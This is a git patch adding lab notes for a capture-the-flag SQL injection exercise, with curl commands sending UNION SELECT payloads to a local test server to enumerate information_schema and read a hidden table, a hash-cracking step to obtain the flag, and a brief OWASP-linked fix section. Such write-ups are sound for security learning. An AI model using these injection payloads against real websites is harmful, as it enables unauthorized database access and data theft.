From 60182e2e8b01466e8eec43ec1ed02c52e53bd6b3 Mon Sep 17 00:00:00 2001
From: Thomas Vanbesien <tvanbesi@proton.me>
Date: Mon, 30 Mar 2026 10:35:18 +0200
Subject: Add SQL injection solutions x2

---
 SQL injection 2/Resources/notes.md | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 SQL injection 2/Resources/notes.md

(limited to 'SQL injection 2/Resources/notes.md')

diff --git a/SQL injection 2/Resources/notes.md b/SQL injection 2/Resources/notes.md
new file mode 100644
index 0000000..282802f
--- /dev/null
+++ b/SQL injection 2/Resources/notes.md	
@@ -0,0 +1,28 @@
+## Exploit
+
+1. See **SQL injection 1**. We do the same recon, but we explore other tables than `users`.
+1. This query, meant to explore the columns of the table `list_images`, does not output anything because it's not in the same table as the original query
+    ```bash
+    curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT title,comment FROM list_images" | sed 's/<pre>\
+    /g' | grep --only-matching "First name:.*"`
+    ```
+1. We use an extra query to find the schema to which the `list_images` table belongs
+    ```bash
+    curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT table_schema,table_name FROM information_schema.columns" | sed 's/<pre>/\
+        /g' | grep --only-matching ".*list_images.*"
+    ```
+1. From the following query we find a clue (similarly to **SQL injection 1**)
+    ```bash
+    curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT title,comment FROM Member_images.list_images" | sed 's/<pre>/\
+        /g' | grep --only-matching "First name:.*"
+    …
+    First name: Hack me ?<br>Surname : If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46</pre><table width=50%>
+    ```
+1. `1928e8083cf461a51303633093573c46` reverse md5 lookup → `albatroz` → `echo -n albatroz | sha256sum`
+
+## Fix
+
+[https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection]()
+
+- Don't show SQL errors on the front-end because it gives attackers clues about the database and the queries that can be used to exploit them
+- Don't include untrusted, unfiltered and/or unsanitized input into a SQL query
-- 
cgit v1.2.3